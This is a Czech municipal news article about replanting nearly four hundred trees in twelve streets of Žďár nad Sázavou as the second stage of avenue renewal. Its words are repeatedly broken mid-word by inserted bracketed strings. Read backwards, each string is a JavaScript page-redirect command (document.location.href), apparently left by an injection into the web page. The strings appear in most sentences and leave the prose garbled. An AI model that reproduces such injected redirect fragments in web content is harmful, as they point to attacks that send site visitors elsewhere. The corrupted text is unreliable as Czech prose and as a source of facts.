Rainbow page separator

Nemocné a nestabilní stromy nahradí v alejích nová výsadba

Pondělí, 1. listopadu 2021

Žďár nad Sázavou / V lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu začne plánovaná výsadba nových stromů v rámci obnovy žďárských stromořadí. Vysazeny budou bezmála čtyři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky dřevin v dvanácti lokalitách, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to především v ulicích Drdlova, Dolní, Jungmannova, Bezručova, Santiniho, Veselská, Zahradní, Jiřího z Poděbrad, 1. máje, Barákova, Horní a Brněnská. Do země půjdou mladé stromky listnáčů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hlavně jilmy, lípy, jírovce, třešně nebo duby. Druhá etapa revitalizace veřejné zeleně ve Žďáře, která je zaměřená na obnovu alejí, zahrnuje výsadbu celkem 384 stromů, což je téměř o dvě třetiny více ne pokácených starých a nemocných či staticky nestabilních dřevin.
Projekt revitalizace alejí navazuje na první etapu obnovy, jež byla provedena v roce 2018. Při ní byly rovněž skáceny nevhodné stromy, jiné zase odborně ošetřeny a další vysazeny v okolí hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova v Jamské ulici a u Horního rybníka, na hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově u kostela Nejsvětější Trojice, v části čtvrti Vodojem, u školy v Palachově ulici, v sídlišti v ulicích Haškova a Chelčického, podél chodníku od nádraží k firmě ŽĎAS a v sídlišti podél ulice Neumannova.